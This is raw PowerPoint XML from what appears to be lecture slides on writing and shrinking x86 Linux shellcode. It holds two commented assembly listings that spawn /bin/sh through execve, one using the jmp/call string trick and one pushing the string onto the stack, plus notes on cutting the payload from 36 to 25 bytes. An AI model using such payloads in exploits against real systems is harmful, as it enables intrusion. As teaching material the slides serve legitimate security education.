                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> of the string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Put 0 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ebx+7], al   ; Null terminate the /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ebx+8], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ; Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> where the AAAA is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ebx+12], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ; Put 32-bit null terminator where the BBBB is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, [ebx+8]  ; Load the address of [ebx+8] into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, [ebx+12] ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + 12, which is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al, 11        ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>two:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  call one          ; Use a call to get string address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shXAAAABBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'     ; The XAAAABBBB bytes aren't needed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134442839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648098"/>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is-IS" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673642065"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exec_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is 36 bytes, we can get it down to 25 bytes, tiny_shell.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Compressing our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> further</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="2411254"/>
            <a:ext cx="8352928" cy="3105978"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [], char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Push some nulls for string termination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x68732f2f   ; Push "//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x6e69622f   ; Push "/bin" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Put the address of "/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, via esp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Push 32-bit null terminator to stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
